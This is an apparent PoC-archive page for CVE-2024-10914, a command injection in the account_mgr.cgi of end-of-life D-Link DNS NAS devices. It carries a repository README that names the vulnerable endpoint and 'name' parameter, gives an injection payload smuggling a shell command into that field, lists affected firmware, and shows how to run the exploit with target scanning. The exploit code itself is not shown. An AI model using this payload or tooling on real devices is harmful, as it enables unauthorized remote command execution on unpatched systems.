Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-10914 PoC — D-Link DNS-320/DNS-320LW/DNS-325/DNS-340L account_mgr.cgi cgi_user_add os command injection

Source
https://github.com/retuci0/cve-2024-10914-port
Associated Vulnerability
Title:D-Link DNS-320/DNS-320LW/DNS-325/DNS-340L account_mgr.cgi cgi_user_add os command injection (CVE-2024-10914)
Description:A vulnerability was found in D-Link DNS-320, DNS-320LW, DNS-325 and DNS-340L up to 20241028. It has been declared as critical. Affected by this vulnerability is the function cgi_user_add of the file /cgi-bin/account_mgr.cgi?cmd=cgi_user_add. The manipulation of the argument name leads to os command injection. The attack can be launched remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used.
Description
dlink vulnerability thing in python and rust
Readme
# CVE-2024-10914 ported to rust and python
because why not

## what is this
cve-2024-10914 is a recently discovered 9.8 critical score vulnerability that affects some dlink routers. because those routers reached their eol support, dlink refuses to patch this vulnerability because "stop being poor and just buy a new router".

## how does this work
the vulnerable devices expose an http endpoint, usually under `/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=<user_input>`. due to improper sanitization, instead of strictly limiting or validating the input (only allowing alphanumeric characters), the application allows any character to be injected, which includes special characters used for command line operations, hence allowing for arbitrary code execution.

by inserting shell metacharacters (such as ; | & or $(command)) in the name field, anyone can run shell commands with ease. for example:

`...name=admin'; echo 'get pwned bozo'; #`

all these script do is send a request with the name parameter changed to whatever code you want to run.

there's a pretty good video by fireship that explains it into more detail: https://www.youtube.com/watch?v=52v6gKPA4TM

## how 2 use:

first you need to have a vulnerable device, some models include:
- DNS-320 (Version 1.00)
- DNS-320LW (Version 1.01.0914.2012)
- DNS-325 (Versions 1.01, 1.02)
- DNS-340L (Version 1.08)

i strongly advise against using this script against someone else without their consent, please only do this stuff if you own the router or you have the owner's consent

### rust
- if you already know the device ip address:
> `cargo run -- -u http://<device ip address>`
- if you want to perform a quick network scan:
> `cargo run`

### python
- first install dependencies
> `pip install -r requirements.txt`
- if you already know the device ip address:
> `python main.py -u http://<device ip address>`
- if you want to perform a quick network scan:
> `python main.py`

then follow instructions

## credits

i did not come up with the original code, [verylazytech](https://github.com/verylazytech/) did. i only ported it to rust and python because why the fuck not. of course all credit goes to him and any other person involved in the discovery of this exploit.

https://github.com/verylazytech/CVE-2024-10914/
File Snapshot

 [4.0K]  /data/pocs/961638098286e8443636c0933b5e781bed140274
├── [ 47K]  Cargo.lock
├── [ 246]  Cargo.toml
├── [4.0K]  main.py
├── [2.2K]  README.md
├── [   8]  requirements.txt
└── [4.0K]  src
    └── [5.4K]  main.rs

1 directory, 6 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →